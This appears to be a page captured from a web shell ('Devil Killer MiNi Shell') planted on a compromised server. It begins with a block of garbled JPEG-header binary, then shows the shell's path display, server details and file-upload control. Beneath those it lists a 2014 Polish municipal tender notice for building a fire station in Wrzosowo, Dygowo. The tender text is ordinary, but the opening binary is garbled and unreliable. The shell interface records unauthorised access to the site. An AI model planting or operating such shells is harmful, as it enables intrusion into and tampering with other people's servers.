JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140228/68530-N-2014.html

<p class="kh_header"><b>Dygowo: Budowa remizy strażackiej we Wrzosowie</b><br>
<b>Numer ogłoszenia: 68530 - 2014; data zamieszczenia: 28.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dygowo , ul. Kolejowa 1, 78-113 Dygowo, woj. zachodniopomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dygowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa remizy strażackiej we Wrzosowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projektowany budynek remizy OSP zaprojektowano jako budynek jednokondygnacyjny z poddaszem nieużytkowym kryty dachem krzywo liniowym, kształt dachu w szczycie posiada widok przekroju hełmu strażackiego z początku XX w. Budynek jest niepodpiwniczony. Garaż posiada wysokość 4,50m w świetle pomieszczenia natomiast pomieszczenia pozostałe wysokość 3,30m w świetle pomieszczenia. Budynek zaprojektowano w konstrukcji murowanej ściany dwuwarstwowej z cegły lub pustaków drążonych silikatowych gr 25 cm izolowaną termicznie styropianem o współczynniku przewodności cieplnej =0,038 W/m*K o identycznych parametrach o gr. 14cm. Zaprojektowano budynek z podłogą na gruncie. Ściany fundamentowe zaprojektowano jako monolityczne wylewane o gr. 25cm ocieplone styrodurem lub materiałem o podobnych parametrach gr. minimalnej 10 cm (np. polistyren spieniony - materiałem ekologicznie obojętnym). Więźba dachowa o układzie dźwigarów krzywoliniowych stężonych w pasie górnym krokwiami. Konstrukcja więźby dachowej jest oparta na wykonawstwie w technologii drewna klejonego łączenie elementów przy pomocy zawieszeń w technologii producenta. Przekrycie sali szkoleniowo treningowej zaprojektowano w technologii dźwigarów klejonych krzywoliniowe ze ściągiem w poziomie oparcia na ścianach. Powierzchnia użytkowa parteru Garaż wozu bojowego nr 1- 57,67 m2, Garaż wozu bojowego nr 2 - 57,67 m2, szatnia 1 -36,18 m2, szatnia 2 - 36,18 m2, WC 1 -5,32 m2 WC 2- 5,32 m2, pomieszczenie gospodarcze - 4,70 m2, komunikacja 1 -16,45 m2, dyspozytornia - 35,25 m2, kotłownia - 34,49 m2, pomieszczenie gospodarcze -4,24 m2, pomieszczenie administracyjne- 24,89 m2, szatnia + WC - 8,47 m2, pomieszczenie kateringowe -16,47 m2, komunikacja2 -7,59 m2, scena - 7,48 m2, sala szkolno-treningowa - 170,73 m2, magazyn podręczny - 13,65 m2, WC (m) - 6,00 m2, WC (k) - 4,92 m2, szatnia - 10,08 m2, wiatrołap - 5,67 m2, Ogółem 569,42 m2 Kubatura budynku- 4192 m3 Wysokość kalenicy nad poz. terenu - 9,00 m Wysokość okapu - 4,82 m ZAKRES ROBÓT - Roboty budowlane- Roboty porządkowe i ziemne, Fundamenty, Izolacje fundamentów, Ściany i elementy konstrukcyjne, Strop nad parterem, Obróbki blacharskie, Ściany działowe, Stolarka okienna, Stolarka drzwiowa, Izolacja poddasza, Tynki wewnętrzne, okładziny, malowanie, Elewacja, Podłoża i posadzki, Ogrodzenie,  Instalacje elektryczne wewnętrzne, zewnętrzna linia zasilania oraz oświetlenie terenu, Zewnętrzne linie zasilające YAKY 5x25 mm2 - 65 m, Kable oświetleniowe YAKY 5x6 mm2 - 322 m, Słupy oświetleniowe 5 m z oprawami 50W - 9 szt., Przewody instalacyjne YDYp 2x1,5 mm2, 3x4,5 mm2, 4x1,5mm2, 5x4mm2, 3x2,5mm2 - 1.851 m, Rozdzielnica wnękowa IP 20 - 1 szt., Oprawy oświetlenia podstawowego - 96 szt., Osprzęt instalacyjny podtynkowy i natynkowy bryzgoszczelny, Instalacja odgromowa przewód DFe fi 8 mm - 346 m, Centralka alarmowa z głośnikami - 1 kpl., Montaż syreny alarmowej, Budowa zjazdu indywidulanego z drogi wojewódzkiej Nr 163 - Nawierzchnia z kostki brukowej betonowej o grubości 8 cm - 32,35m2, Nawierzchnia z kostki brukowej betonowej o grubości 6 cm - 7,07m2, Obrzeża betonowe 30x8 cm - 4,71 m, Roboty rozbiórkowe - ręczne ścinanie i karczowanie - 18 m2, rozebranie chodników, przejść dla pieszych z kostek betonowych - 30,60 m2, rozebranie krawężników kamiennych - 18m., Oznakowanie zjazdu, Budowa zewnętrznych i wewnętrznych instalacji oraz przyłączy sanitarnych - Przyłącze wodociągowe- rurociągi z rur polietylenowych d=40 mm - 42 m, studnia wodomierzowa - 1 szt., wodomierz skrzydełkowy o średnicy nominalnej 20 mm- 1 szt., Przyłącze kanalizacyjne - rury kanalizacyjne PCV d=160 mm - 33,97 m, studzienki kanalizacyjne z PCV o średnicy 425 mm - 3 szt., Przyłącze kanalizacji deszczowej - rurociągi kanalizacyjne PCV dn 160 mm łączonych na uszczelkę - 210 m, rurociągi kanalizacyjne PCV dn 250 mm - 18 m, studnie rewizyjne z kręgów betonowych o średnicy 1000 mm z osadnikiem 1,0 m- 3 szt., studzienki kanalizacyjne PCV o średnicy 425 mm - 10 szt., studzienki kanalizacyjne PCV o średnicy 425 mm z osadnikiem 0,5 m, wpusty uliczne - 6 szt., separatory - 2 szt., Instalacja wody zimnej, ciepłej i cyrkulacji - Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 16 mm woda zimna - 54 m., rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 20 mm woda zimna- 7 m., Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 25 mm woda zimna - 17 m., Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 32 mm woda zimna - 5m, Rurociągi stalowe ocynkowane o połączeniach gwintowych o średnicy 32 mm - 2 m Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 16 mm woda ciepła - 24 m, Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 20 mm woda zimna-37 m, Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 32 mm woda zimna - 6m, Rurociągi z polibutylenu PB układane w rurze osłonowej w budynkach o średnicy 16 mm cyrkulacja - 40 m, montaż zaworów przelotowych i zwrotnych o średnicy 15 mm- 18 szt., montaż zaworów przelotowych i zwrotnych o średnicy 32 mm - 2 szt., Baterie umywalkowe lub zlewozmywakowe - 8 szt., Baterie natryskowe z natryskiem przesuwnym - 2 szt., 20.Instalacja kanalizacji sanitarnej: Rurociągi z PCW o średnicy 160 mm - 29 m, Rurociągi z PCW o średnicy 110 mm - 13 m, Rurociągi z PCW o średnicy 75 mm - 6 m, Rurociągi z PCW o średnicy 50 mm - 12 m, Rurociągi z PCW na ścianach o średnicy 50 mm - 15 m, Rurociągi z PCW na ścianach o średnicy 110 mm - 19,5 m, 21.Instalacja centralnego ogrzewania, Kotłownia: instalacja grzejnikowa dwururowa z rozdziałem dolnym o parametrach 75/55oC, pracująca w układzie pompowym z zabezpieczeniem systemu zamkniętego i wbudowanymi odpowietrznikami przy grzejnikach. Jako źródło ciepła kocioł gazowy o mocy 65 kW. Kotłownia oparta na sprzęgle hydraulicznym 80/60 z króćcami 1,25 oraz dwóch niezależnych obiegów grzewczych: z zaworem mieszającym dn 25 dla zasilania grzejników, bez zaworu zasilającego dla zasilania nagrzewnic. Rozprowadzenie wody grzewczej z rur stalowych. Zasilanie obiegu nagrzewnic z rur stalowych. Grzejniki płytowe oraz łazienkowe. Instalacja c.o. zabezpieczona przez naczynie przeponowe oraz zawór bezpieczeństwa. 22.Instalacja gazowa: Rurociągi stalowe o średnicy 15 mm - 3,5 m, Rurociągi stalowe o średnicy 20 mm - 11,5 m, Rurociągi stalowe o średnicy 32 mm - 11,5 m, Rurociągi stalowe o średnicy 40 mm - 8 m, próby szczelności; Wykonanie utwardzenia terenu z kostki betonowej - 1950,96 m2, osłona śmietnikowa - 5,46 m2
Oprócz w/w robót wykonawca jest zobowiązany do:
1.wykonania zobowiązań wynikających z zawartych w projekcie budowlanym uzgodnień
2.zapewnienia obsługi geodezyjnej  przed i w trakcie prowadzenia robót oraz wykonania dokumentacji geodezyjnej powykonawczej..
3.zorganizowania biura budowy, w którym będzie przechowywany dziennik budowy oraz dokumentacja budowy.
4.Zamontowania tablicy informacyjnej budowy, zgodnie z odpowiednimi przepisami ustawy - Prawo budowlane
5.Wykonania wszelkich badań i pomiarów i opracowań niezbędnych do przekazania obiektu do użytkowania.  
Wykonawca udzieli Zamawiającemu 60-miesięcznej gwarancji na wykonane roboty. 
Zamawiający wymaga aby roboty były prowadzone pod stałym nadzorem osób posiadających uprawnienia budowlane w poszczególnych branżach wymienione w ofercie (Formularz -  Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia.). 
Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej oraz w specyfikacjach technicznych wykonania i odbioru robót stanowiących Rozdział III niniejszej specyfikacji istotnych warunków zamówienia.
Jeżeli w dokumentacji projektowej, przedmiarach robót lub specyfikacjach technicznych wykonania i odbioru robót podano nazwy materiałów, produktów lub urządzeń konkretnych systemów lub producentów to należy taktować to jedynie jako określenie pożądanego standardu i jakości. We wszystkich takich sytuacjach wykonawca może zaoferować równoważne materiały, produkty lub urządzenia. Jeżeli wykonawca powołuje się na rozwiązania równoważne opisywanym jest obowiązany wskazać, że oferowane dostawy i roboty budowlane spełniają wymagania określone przez zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.61.21-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 25.000 zł. (słownie: dwadzieścia pięt tysięcy złotych). Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach:
1. pieniądzu;
2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3. gwarancjach bankowych;
4. gwarancjach ubezpieczeniowych;
5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy Zamawiającego: 21 8562 0007 0040 0291 2000 0060 w Banku Spółdzielczym w Białogardzie Oddział w Dygowie. Za datę wniesienia wadium w pieniądzu uważa się termin uznania rachunku bankowego Zamawiającego.
Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale. Zamawiający zaleca załączenie oryginału wadium do oferty.
Wadium wnoszone przez konsorcjum w innej formie niż pieniądz może być wnoszone przez poszczególnych konsorcjantów. Ze złożonych dokumentów musi wynikać, że wadium zabezpiecza ofertę wspólną.
Zamawiający dokona zwrotu wadium w przypadkach i na zasadach określonych w ustawie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadkach, gdy:
Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku dotyczącego wiedzy i doświadczenia Wykonawca powinien wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
2 prace polegające na wykonaniu robót budowlanych w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm. - dalej Prawo budowlane) obejmujących przebudowę lub budowę budynku o wartości co najmniej 1.800.000 zł netto każda.  lub
1 prace polegające na wykonaniu robót budowlanych w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm. - dalej Prawo budowlane) obejmujących przebudowę lub budowę budynku o kubaturze co najmniej 4.000 m3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować następującymi osobami zdolnymi do wykonania zamówienia:
Funkcja - Uprawnienia - Minimalne doświadczenie zawodowe po uzyskaniu uprawnień
Kierownik budowy	- Uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń - zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578 ze zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia. - 60
miesięcy doświadczenia zawodowego przy realizacji robót konstrukcyjno - budowlanych  jako kierownik budowy lub kierownik robót (w rozumieniu art.12 ust. 1 pkt.2 ustawy Prawo Budowlane)
Kierownik robót elektrycznych - Uprawnienia budowlane w specjalności 
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - zgodnie z rozporządzeniem
 Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. Nr 83, poz. 578 ze zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia. - 36 miesięcy doświadczenia zawodowego przy realizacji robót elektrycznych jako kierownik budowy lub kierownik robót (w rozumieniu art.12 ust. 1 pkt.2 ustawy Prawo Budowlane)
Kierownik robót sanitarnych	- Uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń - zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. Nr 83, poz. 578 ze zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia.	- 36 miesięcy doświadczenia zawodowego przy realizacji robót instalacyjnych jako kierownik budowy lub kierownik robót 
(w rozumieniu art.12 ust. 1 pkt.2 ustawy Prawo Budowlane)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o realizację zamówienia:
powinien posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 1.500.000 zł (słownie: jeden milion pięćset tysięcy  złotych); (warunek dot. zdolności finansowej);
powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 1.500.000 zł (słownie: jeden milion pięćset tysięcy  złotych) (warunek dot. zdolności ekonomicznej);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
